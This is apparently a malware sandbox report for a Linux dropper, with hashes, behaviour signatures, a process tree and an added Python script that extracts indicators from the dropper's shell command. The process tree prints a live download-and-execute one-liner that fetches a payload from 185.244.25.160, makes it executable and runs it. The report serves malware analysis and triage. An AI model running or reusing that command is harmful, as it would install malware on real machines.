Analysis

  • max time kernel
    14s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20231215-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    19-12-2023 22:22

General

  • Target

    02e62eaf2c61151f9de1ced19d0d7a54

  • Size

    12KB

  • MD5

    02e62eaf2c61151f9de1ced19d0d7a54

  • SHA1

    c150c1ba6cc2799ecee52dd34cece106e55e2111

  • SHA256

    bb98f1281560cf24af855d5d3eee42ae119c0b51043712c13ccd1d8201089f88

  • SHA512

    232249af4b288bda6863eccb52726a45a2aafcff34c12ac543044afcf16f71497da12b0dad8b9076e2ee85442385747f2f0b60044b36d8a6413a532af6553728

  • SSDEEP

    384:M/wK+ASlw3vFz1jXk+y6C2tUKXvVC6lqP7:C+AOw3vFzm+yh2tzvVHW7

Score
7/10

Malware Config

Signatures

  • Deletes itself (1 IoC)
  • Reads runtime system information (1 IoC)

    Reads data from the /proc virtual filesystem.

Processes

  • /tmp/02e62eaf2c61151f9de1ced19d0d7a54 (PID:1540)
    /tmp/02e62eaf2c61151f9de1ced19d0d7a54
    • Deletes itself
    • Reads runtime system information
    • /bin/sh (PID:1555)
      sh -c "wget http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 wget.x86"
      • /usr/bin/wget (PID:1556)
        wget http://185.244.25.160/hahdshd73ahshds73/ugei1
      • /bin/chmod (PID:1557)
        chmod 777 config-err-ttnlZv netplan_gvwf8xc7 snap-private-tmp ssh-lVEBGijvRrFk systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-ModemManager.service-RFbCjq systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-bolt.service-6PCYFg systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-colord.service-uJ0RLv systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-fwupd.service-vKHNVb systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-resolved.service-CPtEAB systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-timedated.service-LoDLn9
      • /tmp/ugei1 (PID:1558)
        ./ugei1 wget.x86
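The process tree above carries more than the obvious indicators. The recorded argv of the chmod child (PID 1557) is what `chmod 777 *` became after the shell expanded the unquoted glob against its working directory, so it is a snapshot of /tmp at that instant: ten unrelated systemd and service temp entries were made world-writable and executable, while neither the downloaded `ugei1` nor the dropper's own file is in the list. The first absence means no file had been written by the wget stage when the glob expanded (the Network section records nothing); the second is consistent with the "Deletes itself" signature on PID 1540. The script below, an added example and not part of the sandbox's tooling, pulls the URL, host, dropped filename and executed payload out of the `sh -c` one-liner and performs that cross-check; the command lines and the dropper name are copied from the tree above, and the meaning of the payload argument `wget.x86` is not recorded on this page, so it is reported without interpretation.

```python
"""Extract IoCs from a dropper's `sh -c` one-liner and cross-check them against
the argv the sandbox recorded for the spawned chmod.

Added example for this report. SH_CMD, CHMOD_ARGV and DROPPER_NAME are copied
from the process tree; everything else is illustrative analysis logic.
"""
import shlex
from urllib.parse import urlparse

# Command line of /bin/sh (PID 1555) as recorded in the process tree.
SH_CMD = ("wget http://185.244.25.160/hahdshd73ahshds73/ugei1; "
          "chmod 777 *; ./ugei1 wget.x86")

# argv of /bin/chmod (PID 1557) as recorded: "*" has already been expanded
# by the shell against the contents of its working directory (/tmp).
CHMOD_ARGV = (
    "chmod 777 config-err-ttnlZv netplan_gvwf8xc7 snap-private-tmp ssh-lVEBGijvRrFk "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-ModemManager.service-RFbCjq "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-bolt.service-6PCYFg "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-colord.service-uJ0RLv "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-fwupd.service-vKHNVb "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-resolved.service-CPtEAB "
    "systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-timedated.service-LoDLn9"
).split()

# The Target: the dropper was launched as /tmp/<md5>, i.e. from the same
# directory the glob was expanded in.
DROPPER_NAME = "02e62eaf2c61151f9de1ced19d0d7a54"


def parse_stages(cmd):
    """Split a `sh -c` one-liner on ';' into a list of argv lists."""
    stages = []
    for part in cmd.split(";"):
        argv = shlex.split(part)
        if argv:
            stages.append(argv)
    return stages


def extract_iocs(cmd):
    """Pull network and file indicators out of each stage of the one-liner."""
    iocs = {"urls": [], "hosts": [], "dropped_files": [],
            "exec": [], "payload_args": []}
    for argv in parse_stages(cmd):
        verb = argv[0]
        if verb in ("wget", "curl"):
            # Any absolute http(s) URL given to the downloader is a C2/stager IoC.
            for arg in argv[1:]:
                if arg.startswith(("http://", "https://")):
                    url = urlparse(arg)
                    iocs["urls"].append(arg)
                    iocs["hosts"].append(url.hostname)
                    iocs["dropped_files"].append(url.path.rsplit("/", 1)[-1])
        elif verb.startswith("./"):
            # Relative execution of something that was just fetched into cwd.
            iocs["exec"].append(verb[2:])
            iocs["payload_args"].append(argv[1:])
    return iocs


def cross_check_chmod(cmd, chmod_argv, dropper_name):
    """Compare what the one-liner intended to chmod with what the shell's
    glob expansion actually handed to chmod, and report which expected
    files (the downloaded payload and the dropper itself) were absent."""
    mode = chmod_argv[1]
    touched = set(chmod_argv[2:])
    expected = set(extract_iocs(cmd)["dropped_files"]) | {dropper_name}
    return {
        "mode": mode,
        "world_writable_executable": mode == "777",
        "touched_count": len(touched),
        # Files the glob matched that the dropper had no business touching.
        "touched_unrelated": sorted(touched - expected),
        # Expected files that did not exist when "*" was expanded.
        "missing_when_expanded": sorted(expected - touched),
    }


if __name__ == "__main__":
    print(extract_iocs(SH_CMD))
    print(cross_check_chmod(SH_CMD, CHMOD_ARGV, DROPPER_NAME))
```

`missing_when_expanded` is the field worth reading first in a triage pipeline: a payload name listed there alongside an empty Network section means the second stage was never obtained and the rest of the tree (here `./ugei1 wget.x86` as PID 1558) ran against a file that did not exist, so behavioural signatures for the actual payload should not be expected from this run.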

Network

MITRE ATT&CK Matrix

Downloads

  • memory/1540-1-0x0000000008048000-0x000000000804d608-memory.dmp